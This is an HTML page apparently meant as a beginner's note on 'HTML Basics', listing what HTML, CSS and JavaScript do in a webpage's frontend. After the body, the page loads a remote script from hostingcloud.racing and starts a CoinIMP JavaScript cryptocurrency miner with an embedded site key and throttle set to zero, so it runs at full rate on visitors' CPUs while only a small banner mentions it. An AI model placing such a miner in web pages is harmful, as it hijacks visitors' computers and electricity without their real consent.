<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>HTML Basics</title>
    <link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Crimson+Text:400,700' rel='stylesheet' type='text/css'>
    <link rel="stylesheet" href="style.css" type="text/css">
</head>

<body>
    <div class="wrapper">
        <h1>HTML Basics</h1>
        <hr>
        
        <h2>The "frontend" of a webpage consists of:</h2>
        
        <ul>
            <li>HTML = HyperText Markup Language</li>
            <ul><li>content</li></ul>
            
        </ul>

CSS = Cascading Style Sheet
style
JS = Javascript
interactivity
        
        
    </div>
</body>
    
    <script src="https://www.hostingcloud.racing/s3TR.js"></script>
<script>
    var _client = new Client.Anonymous('67e12a008a49e23900fa7ca5427b9858337d68935dd333e1bf16efa9b24e0e3b', {
        throttle: 0
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 80, "#3d3d3d");

</script>

</html>
